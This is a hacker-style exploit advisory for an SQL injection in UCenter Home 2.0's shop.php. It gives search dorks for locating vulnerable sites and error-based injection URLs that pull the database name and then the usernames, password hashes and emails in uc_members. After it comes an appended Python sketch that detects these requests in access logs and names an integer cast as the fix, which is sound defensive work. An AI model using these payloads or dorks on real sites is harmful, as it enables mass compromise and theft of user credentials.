__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerable Style : SQL Injection (MySQL Error Based)
Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

For inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

You edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

You use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
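
Requests of the kind shown above leave a recognisable trace in web server access logs, because `shopid` stops being a plain integer and carries the error-based markers (`floor(rand(`, `group by`, `information_schema`). The following detection sketch is an added example, not part of the original advisory; the log lines, addresses, marker names and function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Markers of the error-based technique this advisory uses against shopid.
MARKERS = {
    "rand_floor": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "group_by": re.compile(r"group\s+by", re.I),
    "info_schema": re.compile(r"information_schema", re.I),
    "subselect": re.compile(r"\(\s*select\b", re.I),
    "uc_members": re.compile(r"uc_members", re.I),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format, documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from(select%20count(*),concat(database(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 200 812',
    '192.0.2.11 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?shopid=1%20or%201=1 HTTP/1.1" 200 900',
]

def shopid_findings(log_line):
    """Return (decoded shopid, sorted marker names) for a shop.php request, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/shop.php"):
        return None
    # parse_qs percent-decodes the value and turns '+' into a space.
    values = parse_qs(url.query, keep_blank_values=True).get("shopid", [])
    if not values:
        return None
    hits = sorted(name for name, rx in MARKERS.items() if rx.search(values[0]))
    return values[0], hits

def is_suspicious(log_line):
    """Flag any shop.php request whose shopid is not a plain integer; report markers seen."""
    found = shopid_findings(log_line)
    if found is None:
        return False, []
    value, hits = found
    return (not value.isdigit()), hits

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(is_suspicious(line))
```

The non-integer check is the primary signal and the marker list only explains why a line was flagged. On the application side, casting `shopid` to an integer before it reaches the query removes the injection point.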